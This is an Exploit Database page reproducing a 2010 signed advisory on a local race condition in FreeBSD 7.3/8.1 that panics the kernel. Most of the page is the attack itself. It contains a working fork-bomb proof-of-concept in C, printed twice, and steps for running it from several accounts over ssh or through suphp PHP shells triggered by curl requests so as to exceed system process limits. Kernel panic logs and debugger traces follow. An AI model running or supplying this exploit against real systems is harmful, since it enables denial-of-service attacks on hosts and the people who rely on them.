FreeBSD 8.1/7.3 – ‘vm.pmap’ Local Race Condition

• Exploit Database
• 33 阅读

• 作者： Maksymilian Arciemowicz
  日期： 2010-09-08
• 类别：

  • dos
  平台：

  • bsd
• 来源：https://www.exploit-db.com/exploits/14947/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  [ FreeBSD 8.1/7.3 vm.pmap kernel local race condition]
  
  Author: Maksymilian Arciemowicz
  http://SecurityReason.com
  http://lu.cxib.net
  Date:
  - - Dis.: 09.07.2010
  - - Pub.: 07.09.2010
  
  Affected Software (verified):
  - - FreeBSD 7.3/8.1
  
  Original URL:
  http://securityreason.com/achievement_securityalert/88
  
  
  - --- 0.Description ---
  maxproc
  This is the maximum number of processes a user may be running. This
  includes foreground and background processes alike. For obvious reasons,
  this may not be larger than the system limit specified by the
  kern.maxproc sysctl(8). Also note that setting this too small may hinder
  a user's productivity: it is often useful to be logged in multiple times
  or execute pipelines. Some tasks, such as compiling a large program,
  also spawn multiple processes (e.g., make(1), cc(1), and other
  intermediate preprocessors).
  vm.pmap.shpgperproc
  
  
  - --- 1. FreeBSD 8.1/7.3 kernel local race condition ---
  Race condition in pmap, allows attackers to denial of service freebsd
  kernel. Creating a lot of process by fork() (~ kern.maxproc), it's
  possible to denial kernel.
  To bypass the MAXPROC from login.conf, we can use a few users to run PoC
  in this same time, to reach kern.maxproc. suphp can be very usefully.
  
  We need choose vector attack. When we have access to few users via ssh,
  use openssh.
  
  Example attack by ssh
  POC:
  
  /*
  FreeBSD 7.3/8.1 pmap race condition PoC
  Credit: Maksymilian Arciemowicz
  */
  #include <stdio.h>
  #include <sys/types.h>
  #include <unistd.h>
  
  void newproc(){
  again:
  fork();
  sleep(3600*24);
  goto again;
  }
  
  void runfork(){
  pid_t adr;
  if(0!=(adr=fork())) printf("fork not zero\n");
  else {
  printf("fork zero\n");
  newproc();
  }
  }
  
  int main(){
  
  int secdel=5;
  int dev;
  
  // clock with (int)secdel secound frequency
  while(1){
  printf("sleep %i sec\n",secdel);
  sleep(secdel);
  printf("weak up\n");
  
  // create 512 processes
  dev=512;
  while(dev--)
  runfork();
  }
  return 0;
  }
  
  
  127# ssh cx () 0
  Password:
  $ gcc -o poc81 poc81.c
  $ ./poc81
  
  and in the same time (symetric)
  
  127# ssh max () 0
  Password:
  $ gcc -o poc81 poc81.c
  $ ./poc81
  
  Result:
  Jul 29 08:41:29 127 kernel: maxproc limit exceeded by uid 1002, please
  see tuning(7) and login.conf(5).
  Jul 29 08:42:01 127 last message repeated 31 times
  Jul 29 08:44:02 127 last message repeated 119 times
  Jul 29 08:50:27 127 syslogd: kernel boot file is /boot/kernel/kernel
  Jul 29 08:50:27 127 kernel: maxproc limit exceeded by uid 0, please see
  tuning(7) and login.conf(5).
  Jul 29 08:50:27 127 kernel: panic: get_pv_entry: increase
  vm.pmap.shpgperproc
  Jul 29 08:50:27 127 kernel: cpuid = 0
  Jul 29 08:50:27 127 kernel: Uptime: 13m23s
  Jul 29 08:50:27 127 kernel: Cannot dump. Device not defined or unavailable.
  Jul 29 08:50:27 127 kernel: Automatic reboot in 15 seconds - press a key
  on the console to abort
  Jul 29 08:50:27 127 kernel: --> Press a key on the console to reboot,
  Jul 29 08:50:27 127 kernel: --> or switch off the system now.
  Jul 29 08:50:27 127 kernel: Rebooting...
  Jul 29 08:50:27 127 kernel: Copyright (c) 1992-2010 The FreeBSD Project.
  
  But when we have php-shell from several uid`s, we can also use suphp.
  
  Example attack by suphp:
  127# cat cxuser.php
  <?php
  system("./def");
  ?>
  127# ls -la
  total 16
  drwxr-xr-x2 rootwheel 512 Jul 29 08:43 .
  drwxr-xr-x4 rootwheel 512 Jul 29 08:38 ..
  - -rw-r--r--1 cxcx 27 Jul 29 08:38 cxuser.php
  - -rwxr-xr-x1 cxcx 7220 Jul 29 08:38 def
  - -rw-r--r--1 max max27 Jul 29 08:43 maxuser.php
  
  now remote request to cxuser.php and maxuser.php
  
  curl http://victim/hack/cxuser.php
  and in the same time
  curl http://victim/hack/maxuser.php
  
  result:
  Jul 29 08:43:07 localhost login: ROOT LOGIN (root) ON ttyv0
  Jul 29 08:48:30 localhost syslogd: kernel boot file is /boot/kernel/kernel
  Jul 29 08:48:30 localhost kernel: maxproc limit exceeded by uid 1001,
  please see tuning(7) and login.conf(5).
  Jul 29 08:48:30 localhost kernel: panic: get_pv_entry: increase
  vm.pmap.shpgperproc
  Jul 29 08:48:30 localhost kernel: cpuid = 0
  Jul 29 08:48:30 localhost kernel: Uptime: 4m43s
  Jul 29 08:48:30 localhost kernel:
  Jul 29 08:48:30 localhost kernel: Dump failed. Partition too small.
  Jul 29 08:48:30 localhost kernel: Automatic reboot in 15 seconds - press
  a key on the console to abort
  Jul 29 08:48:30 localhost kernel: Rebooting...
  Jul 29 08:48:30 localhost kernel: Copyright (c) 1992-2010 The FreeBSD
  Project.
  
  
  - ---debug log - cron (uid=0)---
  ...
  maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
  maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
  maxproc limit exceeded by uid 1001, please see tuning(7) and login.conf(5).
  maxproc limit exceeded by uid 1002, please see tuning(7) and login.conf(5).
  panic: get_pv_entry: increase vm.pmap.shpgperproc
  cpuid = 0
  KDB: enter: panic
  [ thread pid 7417 tid 106207 ]
  Stopped at kdb_enter+0x3a: movl $0,kdb_why
  ...
  KDB: enter: panic
  [ thread pid 7417 tid 106207 ]
  Stopped at kdb_enter+0x3a: movl $0,kdb_why
  db> ps
  pid ppid pgrp uid state wmesg wchan cmd
  7417 880 880 0 RL CPU 0 cron
  7416 880 880 0 RL cron
  7415 7413 880 0 RVL cron
  7414 7412 7412 0 R sh
  7413 880 880 0 D ppwait 0xc8118548 cron
  7412 7411 7412 0 Ss wait 0xc8118aa0 sh
  7411 880 880 0 S piperd 0xc4d7eab8 cron
  7410 5367 1294 1001 RL+ def
  7409 5366 1294 1001 RL+ def
  7408 5365 1294 1001 RL+ def
  7407 5364 1294 1001 RL+ def
  7406 5363 1294 1001 RL+ def
  7405 5362 1294 1001 RL+ def
  7404 5361 1294 1001 RL+ def
  ...
  db> trace
  Tracing pid 7417 tid 106207 td 0xc8113280
  kdb_enter(c0ccfb5c,c0ccfb5c,c0d0a037,e7f9da38,0,...) at kdb_enter+0x3a
  panic(c0d0a037,10,c0d09b5f,88c,0,...) at panic+0x136
  get_pv_entry(c80bcce0,0,c0d09b5f,ccd,c0fabd00,...) at get_pv entry+0x252
  pmap_enter(c80bcce0,a0f7000,1,c2478138,5,...) at pmap_enter+0x34c
  vm_fault(c8Obcc30,a0f7000,1,0,a0f711b,...) at vm_fault+0x1b02
  trap_pfault(5,0,c0dOblle,c0cd1707,c8118550,...) at trap_pfault+0xl0d
  trap(e7f9dd28) at trap+0x2d0
  calltrap() at calltrap+0x6
  - --- trap 0xc, eip = 0xa0f711b, esp = 0xbfbfec8c, ebp = 0xbfbfecc8 --
  db> show pcpu
  cpuid = 0
  dynamic pcpu = 0x627d00
  curthread = 0xc8113280: pid 7417 "cron"
  curpcb = 0xe7f9dd80
  fpcurthread = none
  idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
  APIC ID = 0
  currentldt = 0x50
  spin locks held:
  ...
  db> show registers
  cs 0x20
  ds 0xc0cc0028
  es 0xc0d00028
  fs 0xc08f0008 free_unr+0x188
  ss 0x28
  eax 0xc0ccfb5c
  ecx 0xc148792f
  edx 0
  ebx 0xl
  esp 0xe7f9d9f8
  ebp 0xe7f9da00
  esi 0x100
  edi 0xc8113280
  eip 0xc08de44a kdb_enter+0x3a
  efl 0x286
  kdb_enter+0x3a: movl $0,kdb_why
  ...
  db> show page
  cnt.v_free_count: 104827
  cnt.v_cache_count: 11
  cnt.v_inactive_count: 3369
  cnt.v_active_count: 44397
  cnt.v_wire_count: 58250
  cnt.v_free_reserved: 324
  cnt.v_free_min: 1377
  cnt.v_free_target: 5832
  cnt.v_cache_min: 5832
  cnt.v_inactive_target: 8748
  ...
  - ---debug log - crash in cron (uid=0)---
  
  - ---debug log - crash in def (uid=1001)---
  db> ps
  ...
  6774 4777 2009 1001 RL+ def
  6773 4777 2009 1001 RL+ CPU 0 def
  6772 4777 2009 1001 RL+ def
  ...
  db> show pcpu
  cpuid = 0
  dynamic pcpu = 0x627d00
  curthread = Oxc8c34c80: pid 6773 "def"
  curpcb = Oxe97f6d80
  fpcurthread = none
  idlethread = 0xc4183a00: tid 100003 "idle: cpu0"
  APIC ID = 0
  currentldt = 0x50
  spin locks held:
  ...
  - ---debug log - crash in def (uid=1001)---
  
  - --- 2. PoC def2.c ---
  /*
  FreeBSD 7.3/8.1 pmap race condition PoC
  Credit: Maksymilian Arciemowicz
  */
  #include <stdio.h>
  #include <sys/types.h>
  #include <unistd.h>
  
  void newproc(){
  again:
  fork();
  sleep(3600*24);
  goto again;
  }
  
  void runfork(){
  pid_t adr;
  if(0!=(adr=fork())) printf("fork not zero\n");
  else {
  printf("fork zero\n");
  newproc();
  }
  }
  
  int main(){
  
  int secdel=5;
  int dev;
  
  // clock with (int)secdel secound frequency
  while(1){
  printf("sleep %i sec\n",secdel);
  sleep(secdel);
  printf("weak up\n");
  
  // create 512 processes
  dev=512;
  while(dev--)
  runfork();
  }
  return 0;
  }
  
  
  - --- 3. Greets ---
  sp3x, Infospec, Adam Zabrocki 'pi3'
  
  
  - --- 4. Contact ---
  Author: SecurityReason.com [ Maksymilian Arciemowicz ]
  
  Email:
  - - cxib {a\./t] securityreason [d=t} com
  
  GPG:
  - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
  
  http://securityreason.com/
  http://lu.cxib.net/
  
  - -- 
  Best Regards,
  - ------------------------
  pub 1024D/A6986BD6 2008-08-22
  uidMaksymilian Arciemowicz (cxib)
  <cxib () securityreason com>
  sub 4096g/0889FA9A 2008-08-22
  
  http://securityreason.com
  http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
  -----BEGIN PGP SIGNATURE-----
  
  iEYEARECAAYFAkyGff0ACgkQpiCeOKaYa9b0QQCfbY7yNcbUa7TDOTYxzgN7ya0y
  yQMAn079PHiu7Uy5WU3gvsJnvzZ0M8qO
  =D5mh
  -----END PGP SIGNATURE-----